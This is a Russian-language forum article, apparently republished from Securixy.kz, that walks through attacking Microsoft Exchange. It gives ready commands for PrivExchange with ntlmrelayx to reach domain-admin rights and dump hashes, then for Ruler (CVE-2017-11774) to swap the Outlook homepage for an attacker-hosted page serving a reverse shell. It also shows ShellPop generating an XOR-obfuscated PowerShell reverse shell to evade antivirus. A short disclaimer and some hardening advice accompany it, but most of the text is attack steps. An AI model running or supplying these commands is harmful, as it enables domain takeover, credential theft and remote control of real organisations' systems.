Статья Атакуем Microsoft Exchange 2016

Привет форумчане!
Не мог обойти эту тему стороной и решил оставить след о ней в нашей замечательной рубрике.

За текущий год на почтовый сервер от Microsoft вышло приличное количество уязвимостей, в том числе кричитеские получившие максимальный бал 10 за серьезность уязвимости. Весь список посмотреть можно .
Прошло уже достаточно времени с тех пор, как вышла уязвимость на Microsoft Exchange с уровнем критичности
Сегодня мы поведаем Вам, что представляет из себя данная уязвимость и какие могут быть последствия.

Дисклеймер: Данная статья написана только в образовательных целях и автор не несёт ответственности за ваши действия. Ни в коем случае не призываем читателей на совершение противозаконных действий. Материал размещен только с целью ознакомления и принятию мер по обеспечению безопасности. Использование материалов в противоправных и противозаконных запрещено законом Вашей страны.
Итак, все атаки начинаются с развердки, и воспользуемся нашим любимым средством netdiscover -r и затем nmap:
nmap -sC -sV 10.168.0.150
На всех Exchange серверах с коробки, по умолчанию открыто достаточно много портов:
nmap_ports.png


!*-Необходимо осторожно подходить к доступности открытых портов, в случае отсутствия необходимости закрывать порты или обеспечивать недоступность портов для всех сотрудников, оставив только самые необходимые.

Наша цель – Открытая уязвимость
Security Updates
To determine the support life cycle for your software version or edition, see the Microsoft Support Lifecycle.
Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 26 4487052 Security Update Elevation of Privilege Important
4468742
Microsoft Exchange Server 2013 Cumulative Update 22 4345836 Security Update Elevation of Privilege Important
Microsoft Exchange Server 2016 Cumulative Update 12 4471392 Security Update Elevation of Privilege Important
Microsoft Exchange Server 2019 Cumulative Update 1 4471391 Security Update Elevation of Privilege Important
Уязвимость настолько серьезная, что каждый пользователь сети может стать админом домена. POC: dirkjanm/PrivExchange
Shema.png


Вся эксплуатация будет происходить под обычным доменным пользователем
whoami.png


Для эксплуатации уязвимости мы быдем использовать ntlmrelayx входящий в состав мощного инструментария Impacket который уже включен в состав , а так же саму уязвимость PrivExchange
Нам необходимо сгенерировать “ссылку” под имеющимся у нас пользователем
python privexchange.py -ah 10.1.42.49 115150.bank.kz -d bank.kz -u bilyk_a -p 123456!
Затем запустить “слушатель”
ntlmrelayx.py -t ldap://115150.bank.kz --escalate-user ntu или impacket-ntlmrelayx -t ldap://115150.bank.kz --escalate-user ntu
Далее под текущим пользователем нам необходимо веб-браузером перейти по ссылке

Покажу Вам результат на не пропатченных системах (IP-адреса и линки могут не совпадать со статьей и указаны для примера):
ntlmrelay-exchange.png

Мы плучаем привелигированного пользователя под которым можно делать все!
secretsdump-hashes.png


Результат на полностью пропатченных системах:
PrivExchange_Impacket.png


Дамп домена сделан. На пропатченных системах атака данной уязвимостью заканчивается получением формалозиванных отчетов о составе контроллера домена (пользователи, группы, политики, компьютеры). Далее мы можем развивать атаку любыми извесными Вам способами использовав полученные данные домена.
Domain_Dump.png
Системная информация эксплуатируеммого почтового сервера, который был атакован
Server_Info.png


Необходимо помимо установки обновлений закрывающих уязвимости в данном конкретном случае провести работы по урезанию прав доступа почтового сервера к контроллеру домена. К сожалению даже с патчами вытаскивать все учетки он будет, exchange будет висеть в правах на чтение личной информации на всех учетках, что наследуют от корня права и группы, необходимо урезать права до минимума, оставить права на редактирование созданных атрибутов и чтение личной информации. Но делать это нужно с предельной осторожностью.

Идейный вдохновитель и первоисточник
Дальше мы можем использовать еще одну не менее серьезную уязвимость под названием Roler
При эксплуатации данной уязвимости, была обнаружена возможность осуществлять различные атаки на конечных пользователей через MS Outlook как проводник между почтовым сервером Exchange и Атакующим.
Цель атаки заключается в уязвимости почтового сервера Echange выполнять удаленные процедуры имея авторизационные данные пользователя, атака называется Ruler и имеет классификацию CVE-2017-11774 ( ).
Microsoft CVE-2017-11774: Microsoft Outlook Security Feature Bypass Vulnerability
Severity 7 ( )
CVSS (AV:N/AC:M/Au:N/C:p/I:p/A:p)
Published 10/10/2017 Created 07/25/2018 Added 10/10/2017 Modified 05/16/2018
Данную уязвимость активно использует группировка APT33 group (она же Elfin) с января 2017 года.
Ruler обладает огромным количеством функций, которые уже были реализованы, и множеством функций, которые еще находятся в разработке.
С его помощью можно:
  • Получить список пользователей
  • Посмотреть текущие настройки правил почты
  • Создать новые вредоносные почтовые правила
  • Удаление почтовые правила
  • Сбросить Глобальный список адресов (Global Address List (GAL))
  • Выполнение VBScript через формы
Для более еффективного взаимодействия с Exchange – ruler использует службу Autodiscover (так же, как и ваш Outlook клиент), чтобы обнаружить соответствующую информацию и оставаться в тени для средств предотвращения вторжений.
В данном случае продемонстрирую, как можно имея пару логина и пароля можно подменить удаленно главную страницу Outlook.

wget https://github.com/sensepost/ruler/releases/download/2.2.0/ruler-linux64
./ruler-linux64 --username "golovin_s" --password "123456!" --email "golovin_s@bank.kz" check --url https://exchmail.bank.kz/autodiscover/autodiscover.xml
Если нужен вывод и обход сертификата – используйте –verbose –insecure –debug check
Ruler.png


Получив удачный ответ от сервера, можем подменять главную страницу к примеру на реверс шелл
./ruler-linux64 --username "golovin_s" --email "golovin_s@bank.kz" --url https://115150.bank.kz/Autodiscover/Autodiscover.xml --verbose --insecure homepage add --url "http://10.1.42.49:80/EXCH.html"
Заходим в оутлук и удивляемся
Outlook-Reverse.png


Наша главная страница заменена. На скриншоте я специально совершил опечатку в инъекции для того, чтобы наглядно было видно что инъекция прошла.
Сам реверс можно использовать ShellPOP с обходом AV систем
cd /opt && git clone https://github.com/0x00-0x00/ShellPop.git
cd ShellPop && chmod +x setup.py && python setup.py install && pip install -r requirements.txt && shellpop -list
shellpop --host eth0 -P 1234 --payload windows/reverse/tcp/powershell --xor

Как видите атаки на почтовый сервер Exchange разнообразны и могут нести за собой серьезные последствия от повышения привелегий до уровня “Бога Домена” или атак на пользователей.
!Не используйте данную информацию во вред, только для улучшения собственной безопасности.

Статья взята с Securixy.kz
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!